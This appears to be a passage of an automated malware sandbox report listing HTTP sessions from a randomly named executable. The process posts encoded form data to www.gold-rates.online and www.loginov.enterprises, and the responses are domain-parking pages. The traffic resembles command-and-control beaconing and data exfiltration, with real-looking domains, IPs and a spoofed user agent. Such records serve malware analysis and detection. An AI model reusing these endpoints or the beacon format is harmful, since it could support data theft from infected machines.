2	192.168.2.4	49765	199.59.243.227	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:40.009017944 CET	713	OUT	POST /026w/ HTTP/1.1 Host: www.gold-rates.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.gold-rates.online Referer: http://www.gold-rates.online/026w/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 7a 4c 74 4c 45 44 5a 54 4c 72 43 46 62 46 7a 55 66 4c 6a 6e 37 73 2b 4b 6d 33 42 65 6d 2f 36 7a 70 52 58 44 4a 49 35 38 58 49 32 48 4f 38 75 55 76 32 58 66 69 33 6a 38 68 53 55 41 41 6d 4e 6d 6e 66 31 58 42 4d 67 66 4a 49 65 59 56 2f 6f 44 33 30 66 43 63 79 36 30 6e 35 7a 66 77 78 5a 56 53 2b 67 57 6f 47 38 42 32 79 67 53 38 7a 6c 56 4b 4a 53 57 50 55 6f 68 6a 5a 62 73 37 52 4b 55 75 6c 66 4b 57 6c 7a 50 59 6c 57 6a 35 6f 59 4e 56 56 58 35 70 2f 36 59 53 6e 6d 55 58 35 5a 48 2f 5a 4c 2b 2f 4d 47 41 65 48 53 52 6b 7a 56 2b 53 35 4e 75 75 49 66 52 34 4a 61 58 74 75 64 6c 69 6e 32 67 59 65 44 69 71 62 49 3d Data Ascii: NbcPAHe=oaImfau1/9zZzLtLEDZTLrCFbFzUfLjn7s+Km3Bem/6zpRXDJI58XI2HO8uUv2Xfi3j8hSUAAmNmnf1XBMgfJIeYV/oD30fCcy60n5zfwxZVS+gWoG8B2ygS8zlVKJSWPUohjZbs7RKUulfKWlzPYlWj5oYNVVX5p/6YSnmUX5ZH/ZL+/MGAeHSRkzV+S5NuuIfR4JaXtudlin2gYeDiqbI=
Nov 7, 2024 08:09:40.653666019 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 07 Nov 2024 07:09:40 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: 585313e7-3702-4d3e-bc5a-e873c5657f7b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw== set-cookie: parking_session=585313e7-3702-4d3e-bc5a-e873c5657f7b; expires=Thu, 07 Nov 2024 07:24:40 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 7, 2024 08:09:40.653698921 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTg1MzEzZTctMzcwMi00ZDNlLWJjNWEtZTg3M2M1NjU3ZjdiIiwicGFnZV90aW1lIjoxNzMwOTYzMz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49781	199.59.243.227	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:42.552428007 CET	10795	OUT	POST /026w/ HTTP/1.1 Host: www.gold-rates.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.gold-rates.online Referer: http://www.gold-rates.online/026w/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 7a 4c 74 4c 45 44 5a 54 4c 72 43 46 62 46 7a 55 66 4c 6a 6e 37 73 2b 4b 6d 33 42 65 6d 2f 43 7a 70 69 66 44 62 5a 35 38 55 49 32 48 53 73 75 4a 76 32 58 47 69 33 72 6e 68 53 5a 69 41 6b 46 6d 6e 38 4e 58 4a 66 34 66 51 34 65 59 4b 76 6f 47 34 55 65 41 63 79 71 34 6e 35 6a 66 77 78 5a 56 53 38 49 57 68 33 38 42 30 79 67 52 78 6a 6c 5a 41 70 53 79 50 51 45 78 6a 5a 66 57 37 68 71 55 75 46 50 4b 46 44 76 50 58 6c 57 32 36 6f 5a 51 56 56 62 6d 70 2f 58 6a 53 6d 53 2b 58 35 74 48 39 74 36 58 67 4e 71 61 4b 46 48 58 2f 55 31 44 53 34 46 2f 68 35 44 4c 35 4b 43 4e 2f 64 70 30 67 52 33 2f 4b 75 44 53 38 63 64 35 44 74 33 79 38 46 77 4a 6b 2f 53 78 56 71 77 59 72 32 79 49 5a 68 2b 58 6d 66 61 2b 51 2b 6a 37 61 70 6c 4e 61 42 31 70 61 57 71 46 4e 61 70 32 31 61 71 51 34 6a 39 54 64 72 48 36 37 6e 74 50 32 6c 6c 65 76 36 57 66 32 5a 53 57 38 37 6d 6d 73 47 71 38 4a 62 35 35 57 39 76 6b 53 34 78 58 6a 66 39 46 37 6b 72 63 79 6e 4b 38 41 63 7a 58 74 59 [TRUNCATED] Data Ascii: NbcPAHe=oaImfau1/9zZzLtLEDZTLrCFbFzUfLjn7s+Km3Bem/CzpifDbZ58UI2HSsuJv2XGi3rnhSZiAkFmn8NXJf4fQ4eYKvoG4UeAcyq4n5jfwxZVS8IWh38B0ygRxjlZApSyPQExjZfW7hqUuFPKFDvPXlW26oZQVVbmp/XjSmS+X5tH9t6XgNqaKFHX/U1DS4F/h5DL5KCN/dp0gR3/KuDS8cd5Dt3y8FwJk/SxVqwYr2yIZh+Xmfa+Q+j7aplNaB1paWqFNap21aqQ4j9TdrH67ntP2llev6Wf2ZSW87mmsGq8Jb55W9vkS4xXjf9F7krcynK8AczXtYDLrRgfLLXwYEgIWW+RiVVGbKy0Ew9yco3a0GPOQDHnIT+QmmlyzkldZVxsp2AVlrffFORuik01p8XtLPaCifowIZ2xKwZT/Z6NQXOaYOuvfwWpZZ5aH4mgZWWTUl5YFXjzKh4i+DQZUw46oiThDqnyOyOeZVcznfIILYR5sUxmCzA4VSC6o6dUsISxEz5gzLv8yhtKWMi5YewYY6ySVRikNxraeff/ysQwARdnhOzjoIXrehwWY7iJq4pnaN/tGZiQstdpCqdyeH1QoRhwNJR2j7icazuNZ80Z2zcqSLie3VmFeXCeMCBSQubKH0W96UWoST8PRxSE9VBkiPH911047BjuP+zZMbgF+RpAIySf3vCXnU+2/TjqfGfkSvsFrLmQ++v7PPIalil7IKdZcb7FU+bAlK7KNE7EUuAUMD6nItx47oVBCvNeKprPaSgze7kR7RCM03SKmwVlFJg+2oHUHHgq7b59Knfs8S15bPQwHfZTJOpnBzjiTsFwTPET1y6IBefeN9cQrTrjoiBoDUs9WeJ2AURil8JA1mv4DUmN8UMvhF/8mGs0Gtxcp8ffczd0ydUVkmNpSBFz2elcCzic4j9T3EG8ab7JdeJhuIDivpUMD+KyGhQKeHEytny8RRl/aJJg783mGXdB5aZXcfTeR2xcE74HIG4s [TRUNCATED]
Nov 7, 2024 08:09:43.206068039 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 07 Nov 2024 07:09:42 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: b66f5723-ea4c-42c3-90d1-a42d1f57f5b3 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw== set-cookie: parking_session=b66f5723-ea4c-42c3-90d1-a42d1f57f5b3; expires=Thu, 07 Nov 2024 07:24:43 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 7, 2024 08:09:43.206084967 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjY2ZjU3MjMtZWE0Yy00MmMzLTkwZDEtYTQyZDFmNTdmNWIzIiwicGFnZV90aW1lIjoxNzMwOTYzMz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49795	199.59.243.227	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:45.095477104 CET	412	OUT	GET /026w/?NbcPAHe=lYgGcuisybLP7Ls2RmpAG7O7UVmwB+Xi1NyGnRgJosPR9gPGPpYXP8moMcmegmveynv5+gYGX20ShvoOLspZRZz+Xfgi0XSdXD2iqff61Dw3F84CikMDqUU=&9Pj=rz_D HTTP/1.1 Host: www.gold-rates.online Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:09:45.717549086 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 07 Nov 2024 07:09:45 GMT content-type: text/html; charset=utf-8 content-length: 1458 x-request-id: 72cb8901-0c09-4303-9d10-4d7ceeefa4bc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_g4BBx7wzWLqCxblE6hN83UqfzahcNtr7h0AY5psl1cXcnIzm0bdhsAjyIq5pWX1Q34gAotl3aGUubSpz1lqXpA== set-cookie: parking_session=72cb8901-0c09-4303-9d10-4d7ceeefa4bc; expires=Thu, 07 Nov 2024 07:24:45 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 67 34 42 42 78 37 77 7a 57 4c 71 43 78 62 6c 45 36 68 4e 38 33 55 71 66 7a 61 68 63 4e 74 72 37 68 30 41 59 35 70 73 6c 31 63 58 63 6e 49 7a 6d 30 62 64 68 73 41 6a 79 49 71 35 70 57 58 31 51 33 34 67 41 6f 74 6c 33 61 47 55 75 62 53 70 7a 31 6c 71 58 70 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_g4BBx7wzWLqCxblE6hN83UqfzahcNtr7h0AY5psl1cXcnIzm0bdhsAjyIq5pWX1Q34gAotl3aGUubSpz1lqXpA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 7, 2024 08:09:45.717580080 CET	911	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzJjYjg5MDEtMGMwOS00MzAzLTlkMTAtNGQ3Y2VlZWZhNGJjIiwicGFnZV90aW1lIjoxNzMwOTYzMz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49826	3.33.130.190	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:50.920037031 CET	699	OUT	POST /b8ns/ HTTP/1.1 Host: www.loginov.enterprises Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.loginov.enterprises Referer: http://www.loginov.enterprises/b8ns/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 6a 57 55 34 66 42 2b 4c 50 70 76 58 39 63 75 4f 4b 67 53 2f 6f 38 75 51 6d 4f 54 77 57 71 6d 59 35 71 4f 54 6b 41 61 35 67 77 46 6a 41 63 4f 49 35 56 72 42 63 35 6c 75 4b 34 72 7a 74 63 75 7a 6d 76 78 6d 6e 50 47 4c 36 70 45 62 43 67 36 7a 74 79 56 6e 4a 5a 42 32 72 64 2b 67 36 5a 61 4b 4b 2f 71 46 6c 37 79 57 6b 65 74 63 33 76 64 6e 30 74 75 65 74 36 67 47 4d 71 34 4e 46 66 4c 63 71 65 6e 37 76 4c 34 38 56 78 49 36 63 71 70 77 74 35 51 76 33 4b 36 58 47 51 36 72 4a 4b 54 61 74 6a 70 6a 55 68 64 45 6a 35 42 4c 38 6e 4e 56 30 56 68 63 52 67 3d 3d Data Ascii: NbcPAHe=NFEz1TYM196VjWU4fB+LPpvX9cuOKgS/o8uQmOTwWqmY5qOTkAa5gwFjAcOI5VrBc5luK4rztcuzmvxmnPGL6pEbCg6ztyVnJZB2rd+g6ZaKK/qFl7yWketc3vdn0tuet6gGMq4NFfLcqen7vL48VxI6cqpwt5Qv3K6XGQ6rJKTatjpjUhdEj5BL8nNV0VhcRg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49842	3.33.130.190	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:53.458730936 CET	719	OUT	POST /b8ns/ HTTP/1.1 Host: www.loginov.enterprises Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.loginov.enterprises Referer: http://www.loginov.enterprises/b8ns/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 69 32 45 34 45 6a 57 4c 49 4a 76 55 32 38 75 4f 42 41 53 37 6f 38 69 51 6d 4c 7a 61 52 66 32 59 35 49 6d 54 6c 42 61 35 6c 77 46 6a 4c 38 4f 33 6d 6c 72 65 63 35 68 6d 4b 39 44 7a 74 59 47 7a 6d 75 42 6d 6d 2b 47 4d 36 35 45 5a 62 77 36 4c 79 69 56 6e 4a 5a 42 32 72 64 72 31 36 5a 43 4b 4c 4f 36 46 6b 61 79 56 69 75 74 66 77 76 64 6e 77 74 76 56 74 36 67 6f 4d 72 6b 72 46 61 48 63 71 66 58 37 76 35 51 37 4d 42 4a 51 59 71 6f 39 74 35 74 78 39 62 44 76 65 7a 43 6e 55 65 6e 69 6c 46 6b 35 46 51 38 54 78 35 6c 34 68 67 45 68 35 57 63 56 4b 69 56 47 67 79 73 74 53 4e 6e 45 51 6a 45 69 64 34 47 73 75 41 49 3d Data Ascii: NbcPAHe=NFEz1TYM196Vi2E4EjWLIJvU28uOBAS7o8iQmLzaRf2Y5ImTlBa5lwFjL8O3mlrec5hmK9DztYGzmuBmm+GM65EZbw6LyiVnJZB2rdr16ZCKLO6FkayViutfwvdnwtvVt6goMrkrFaHcqfX7v5Q7MBJQYqo9t5tx9bDvezCnUenilFk5FQ8Tx5l4hgEh5WcVKiVGgystSNnEQjEid4GsuAI=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49858	3.33.130.190	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:56.006114006 CET	10801	OUT	POST /b8ns/ HTTP/1.1 Host: www.loginov.enterprises Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.loginov.enterprises Referer: http://www.loginov.enterprises/b8ns/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 69 32 45 34 45 6a 57 4c 49 4a 76 55 32 38 75 4f 42 41 53 37 6f 38 69 51 6d 4c 7a 61 52 63 57 59 34 35 47 54 6b 69 43 35 69 77 46 6a 43 63 4f 4d 6d 6c 71 45 63 34 46 69 4b 39 48 4e 74 65 43 7a 6e 4d 5a 6d 76 73 69 4d 77 35 45 5a 47 67 36 77 74 79 56 79 4a 59 78 79 72 64 37 31 36 5a 43 4b 4c 4e 79 46 77 37 79 56 67 75 74 63 33 76 64 7a 30 74 75 79 74 36 6f 65 4d 6f 49 6b 46 4a 50 63 71 2f 48 37 74 74 77 37 46 42 49 32 66 71 70 75 74 35 68 51 39 62 65 57 65 79 33 49 55 5a 50 69 6e 42 31 35 42 67 77 46 31 35 77 71 79 33 6b 30 77 48 6b 44 53 69 6b 35 6e 54 38 51 4e 2b 54 45 4b 54 31 50 47 34 66 6e 38 30 78 7a 4a 38 39 6a 63 46 7a 55 53 70 30 38 6c 59 65 4c 77 50 35 53 2b 6d 4d 46 38 72 72 33 68 78 67 71 47 71 61 30 58 42 69 4e 2b 43 47 50 46 50 2b 78 4c 2f 5a 37 45 53 43 4a 36 59 4c 67 48 2f 6c 75 7a 32 52 42 67 62 77 53 6e 48 36 65 55 67 74 70 73 37 68 59 5a 6e 6c 42 4a 69 6a 4b 43 71 64 32 52 43 2f 34 71 66 73 54 72 79 7a 4b 45 75 54 66 77 50 [TRUNCATED] Data Ascii: NbcPAHe=NFEz1TYM196Vi2E4EjWLIJvU28uOBAS7o8iQmLzaRcWY45GTkiC5iwFjCcOMmlqEc4FiK9HNteCznMZmvsiMw5EZGg6wtyVyJYxyrd716ZCKLNyFw7yVgutc3vdz0tuyt6oeMoIkFJPcq/H7ttw7FBI2fqput5hQ9beWey3IUZPinB15BgwF15wqy3k0wHkDSik5nT8QN+TEKT1PG4fn80xzJ89jcFzUSp08lYeLwP5S+mMF8rr3hxgqGqa0XBiN+CGPFP+xL/Z7ESCJ6YLgH/luz2RBgbwSnH6eUgtps7hYZnlBJijKCqd2RC/4qfsTryzKEuTfwPRcNBuIezXIxV9ZFMkXrnGoCvuk1S5XLVk7Z7PMdRr6GvPfjs3rGgg07c9HPa7wH4E9TVOJ84MyaYA+fzJS5A7VqxuGbu71r0jHs9KA41NyVsmY1Qo9zEcpfbFGJxYQIvmkaBbxgjJEi9Uv7xLH/hQO2EShjXmI9LnYAm7vjzWGrAfmu112Zygo6Je+jQwK7Zgpf5TNUmu+TcwdiEL7+j8XlyM+jkyeIGHBqqK5CZo057lhGICLwaVYWbdSUrUfMbVBACVHvB3zhQNT2HyXV/Hv0CRfs8mQiXxLytNjBmP35/PgLgHBGkgb31feirEfrhYHpEWam4+t1c5LAqH4GqHCcoZSpfCUhcI43KMiQPtBSvB25i4RjSkOWnEEr0df1Ua8OBb6K8sCEBGFUsuQ4zmb1r9Wh4NdhC0N1s2m8ffSpsw9YxGkFT42WXXJWEaomV/MuFJwBz5l/2kTDcUGiLzfKltH4IXspFcYsor/3v49GzbUirQKgcJwolrfScl+MYziIZO8MIXqWFE9PvOgG9SPGKD2rFR5yo1J0a0hMhYYDunwHkRGVlgHlu+23VT8hS52YfzI0TZeEFuKkQFYIQxSCW6Eqx193Lb8EmnAeKiuwAlIoBGEryksfJXtR9qY/i6/SYFi77L4KxGHcYqXAAhEmkfDy6nJPNuh [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49874	3.33.130.190	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:58.549581051 CET	414	OUT	GET /b8ns/?9Pj=rz_D&NbcPAHe=AHsT2lQM7afkvhgoTXaEPozK6vnsC2K6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0oJQYSGbyxd1Ea4wpo/x7IHrd/aWl4Cajac= HTTP/1.1 Host: www.loginov.enterprises Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
